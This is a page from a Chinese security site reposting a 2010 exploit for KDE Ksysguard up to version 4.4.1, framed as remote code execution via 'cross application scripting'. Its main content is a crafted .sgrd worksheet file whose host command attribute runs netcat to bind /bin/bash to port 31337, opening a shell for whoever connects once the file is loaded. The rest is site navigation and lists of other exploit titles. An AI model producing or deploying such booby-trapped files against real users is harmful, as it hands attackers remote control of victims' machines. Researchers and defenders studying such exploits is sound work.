首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
KDE <= 4.4.1 Ksysguard RCE via Cross Application Scripting
来源:http://www.backtrack.it/~emgent 作者:emgent 发布时间:2010-03-22  

# Exploit Title: Ksysguard RCE via Cross Application Scripting
# Date: 2010 03 20
# Author: Emanuele 'emgent' Gentili
# Code: http://www.backtrack.it/~emgent/exploits/20100320_Ksysguard_RCE_CAS.txt
# Version: <= 4.4.1
# CVE : N/A
# Vendor: http://www.kde.org
# Video: http://www.backtrack.it/~emgent/videos/16032010_-_SecuritySummit_CAS_OWNING_KDE.mov
# About CAS: http://en.wikipedia.org/wiki/Cross_Application_Scripting
#            http://it.wikipedia.org/wiki/Cross_Application_Scripting

 

halfapple:~ emanuelegentili$ cat ph33r.sgrd
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE KSysGuardWorkSheet>
<WorkSheet title="She" interval="2" locked="0" rows="2" columns="2" >
<host command="nc -l -p31337 -e /bin/bash" /> </WorkSheet>
halfapple:~ emanuelegentili$

 


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·eDisplay Personal FTP server 1
·eDisplay Personal FTP server 1
·eDisplay Personal FTP server 1
·JITed egg-hunter stage-0 shell
·Apple Safari <= Tag (heap spra
·ZKSoftware Biometric Attendenc
·Woltlab Burning Board Teamsite
·no$gba 2.5c (.nds) local crash
·Realtek Media Player Playlist
·Crimson Editor r3.70 SEH Overw
·Xilisoft Video Converter(.yuv
·Apple Safari 4.0.5 (object tag
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved